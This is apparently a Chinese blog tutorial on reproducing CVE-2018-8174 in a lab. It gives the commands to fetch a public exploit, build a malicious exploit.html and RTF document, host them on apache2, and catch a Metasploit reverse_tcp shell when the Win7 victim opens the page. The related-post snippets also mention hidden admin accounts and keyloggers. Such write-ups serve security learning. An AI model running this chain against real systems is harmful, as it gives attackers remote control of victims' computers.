Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透3 —利用 0DAY 漏洞 CVE-2018-8174 获取 shell

已于 2024-07-02 13:32:38 修改
阅读量820 收藏 7
点赞数 21
文章标签: 网络安全 windows
于 2024-06-28 11:16:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63701503/article/details/140037061
版权

目录

利用 0DAY 漏洞 CVE-2018-8174 获取 shell

(1)、安装 CVE-2018-8174_EXP

(2)、用python2生成恶意 html 文件到网站根目录,并启动 apache2 服务

(3)、新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听

Metasploitable2-linux:靶机 192.168.234.8

kali-debian:攻击机 192.168.234.141

win7 虚拟机:靶机 192.168.234.158

在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!

利用 0DAY 漏洞 CVE-2018-8174 获取 shell

                 ——利用0DAY漏洞(IE浏览器的漏洞)可以向页面注入libs脚本,可以写libs木马脚本注入进去,进行木马攻击,类似于XSS

总结:

        (1)、git clone安装 CVE-2018-8174的EXP到kali

        (2)、用python2、EXP生成恶意 html 文件到网站根目录,并启动 apache2 服务

        (3)、新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听

                        —— 利用exploit/multi/handler模块,设置payloads为windows/shell/reverse_tcp

(1)、安装 CVE-2018-8174_EXP

root@zwzj:~# git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git 或

git clone https://github.com/Yt1g3r/CVE-2018-8174_ExP.git

                        ————从 github 上克隆 CVE-2018-8174 的 EXP 到 Kali

若无法下载或者没有资源、无法访问,可直接在百度网盘接收文件

链接:https://pan.baidu.com/s/1CAD51uknvQbkEUVo1Hm3vA?pwd=wcpv 
提取码:wcpv 

(2)、用python2生成恶意 html 文件到网站根目录,并启动 apache2 服务

root@zwzj:~# cd CVE-2018-8174_EXP-master/

root@zwzj:~/CVE-2018-8174_EXP-master# ls

CVE-2018-8174.py README.md

root@zwzj:~/CVE-2018-8174_EXP-master# python2 CVE-2018-8174.py -u http://192.168.234.141/exploit.html -o hack.rtf -i 192.168.234.141 -p 4444

                                ————注意与要用python2执行,语法有不同

参数说明:

                -u:URL 地址,恶意 html 文件 hack.html 的访问地址

                -o:生成文档

                -i:监听地址

                -p:监听端口

恶意 html 文件生成成功:

root@zwzj:~/CVE-2018-8174_EXP# cp exploit.html /var/www/html/

                                        ————将恶意 html 文件移动到网站根目录

root@zwzj:~/CVE-2018-8174_EXP# service apache2 start                 ——启动 apache2 服务

(3)、新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听

root@zwzj:~# msfconsole

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.234.141

msf6 exploit(multi/handler) > set LPORT 4444

msf6 exploit(multi/handler) > exploit

进入 win7靶机,打开浏览器,访问恶意http://192.168.234.141/exploit.html         

                                                        ——靶机点击恶意链接

返回 kali 查看已经建立会话,攻击获取shell成功

久久归依
关注
[网络安全自学篇] 十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
CVE-2018-8174
weixin_43268670的博客
12-29 330
转载:https://blog.csdn.net/weixin_43894771/article/details/104781919 0day一把怎样的武器 0day漏洞,又称“零日漏洞”(zero-day),是已经被发现(有可能未被公开),而官方还没有相关补丁的漏洞。通俗地讲就是,除了漏洞发现者,没有其他的人知道这个漏洞的存在,并且可以有效地加以利用,发起的攻击往往具有很大的突发性与破坏性。 进入实战,学习0day更多的是学习一种思维模式 1、安装CVE-2018-8174_EXP 从githu.
cve-2018-8174_analysis:VBS漏洞CVE-2018-8174的分析
05-02
剖析现代浏览器漏洞CVE-2018-8174的案例研究 概述 当这种漏洞利用在4月和5月初首次出现时,引起了我的极大兴趣,因为尽管进行了大量的混淆,但代码结构似乎井井有条,漏洞利用代码小得足以使分析变得更简单。 我下载了并决定将其作为深入研究的理想之选。 当时已经发表了两项分析,第一篇来自 ,第二篇来自。 他们俩都帮助我了解了它的工作原理,但还不足以深入了解漏洞利用的各个方面。 这就是为什么我决定自己进行分析并分享我的发现的原因。 前处理 首先,为了消除整数混淆,我在python脚本中使用了正则表达式替换: import re def process ( matchobj ): line = matchobj . group ( 1 ) line = line . lower (). replace ( '&h' , '0x' ) return str ( eval ( line
CVE-2018-2628补丁安装手册
07-24
关于各种weblogic版本出现这个漏洞的修补方法,比较全面
双杀 0day 漏洞CVE-2018-8174)复现
andiao1218的博客
06-12 487
漏洞描述: CVE-2018-8174Windows VBScript Engine 代码执行漏洞。 微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174 由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或...
CVE-2018-8174漏洞复现及内网渗透攻击
Waldocsdn的博客
03-12 2712
文章目录说明CVE-2018-8174漏洞简介Persistence后门环境搭建拓扑图Win server 2008 对Windows 7开启1433端口内网攻击过程1号机获得2号机的权限利用CVE-2018-8174漏洞获取2号机(Windows 7)权限,添加攻击者用户添加超级隐藏管理员账户使用vbs脚本上传SQLTOOLS.exe从Windows 7进攻Windows server 2008...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4560
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
远古漏洞-永恒之蓝(CVE-2017-0146)的复现及其个人思考。
2301_82167660的博客
09-18 939
哪一年才算是真正的“网络安全元年”?2017年。2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
内网渗透技巧大全
黑战士的博客
04-28 1459
对于内部帐户,SPN将自动进行注册。SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。参考2 :https://3gstudent.github.io/Office-Persistence-on-x64-operating-system。安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。
网络安全之路:我的系统性渗透测试学习框架
03-19 1694
没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记中找到答案么嘿嘿嘿嘿!!!) 注意:以下内容仅记录本人当时学习时任然不知的相关知识。笔记草率,可能有错,仅供参考。我会慢慢完善的哦! 写在前面: 1.业界比较好的信息安全网站: freebuff:这个看来你已经找到了 secWiKi:ennnnn 安全客:收集了各大SRC哦,如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug,赶快去提交吧,也可以去补天,漏洞盒子提交哦!还有众测平台哈哈哈。还有
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
热门推荐
杨秀璋的专栏
03-05 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
[网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这篇文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
CVE-2018-8174漏洞两种姿势的复现
qq_39627497的博客
12-06 1万+
CVE-2018-8174漏洞两种姿势的复现 CVE-2018-8174漏洞两种姿势的复现 漏洞介绍: 该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,并将其命名为CVE-2018-8174。 复现过程1: 1、...
Kali利用0DAY漏洞CVE-2018-8174获取shell权限
weixin_43894771的博客
03-10 2070
*0day一把怎样的武器 0day漏洞,又称“零日漏洞”(zero-day),是已经被发现(有可能未被公开),而官方还没有相关补丁的漏洞。通俗地讲就是,除了漏洞发现者,没有其他的人知道这个漏洞的存在,并且可以有效地加以利用,发起的攻击往往具有很大的突发性与破坏性。*
msf利用0DAY漏洞获取shell
Deeeelete的博客
02-23 736
安装CVE-2018-8174_EXP git clone https://github.com/iBearcat/CVE-2018-8174_EXP .git 然后发现没克隆下来,所以这里我直接用xshell上传了zip包并解压在本目录 进入我们的文件目录 cd CVE-2018-8174_EXP-master/ 生成恶意html文件 python CVE-2018-8174.py -...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8530
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
list(c++)
qq_75271671的博客
10-30 1136
list是STL容器中的容器,且元素在容器中的位置是分散的并与大小无关。list的底层是双向链表,其优势是在任意位置插入和删除元素的时间复杂度为O(1),但无法通过“下标[ ]”直接访问元素,需要通过从头(尾)遍历元素找到元素,多用于需要大量数据的插入和删除,且对数据的随机访问比较少。 二、list 的iterator的使用 三、list capacity 接口说明 empty 检测list是否为空,是返回true,否则返回false size
今日好题——单链表
最新发布
2301_80681378的博客
10-30 424
合并有序链表&约瑟夫问题
java异步多线程精讲和多种写法
sunsiny
10-30 1265
如果需要更细粒度的控制,也允许你指定自定义的线程池。你可以通过Executor参数来实现:ExecutorService executor = Executors.newFixedThreadPool(10);// 任务逻辑通过ForkJoinPool实现了高效的异步任务处理,利用工作窃取模型和任务分解策略来提高并行处理能力。它的设计使得开发者能够以非阻塞的方式编写异步代码,同时提供了丰富的API来处理任务结果和异常。通过合理使用,程序员可以显著提高应用程序的响应性和性能。功能性提供了比Future。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值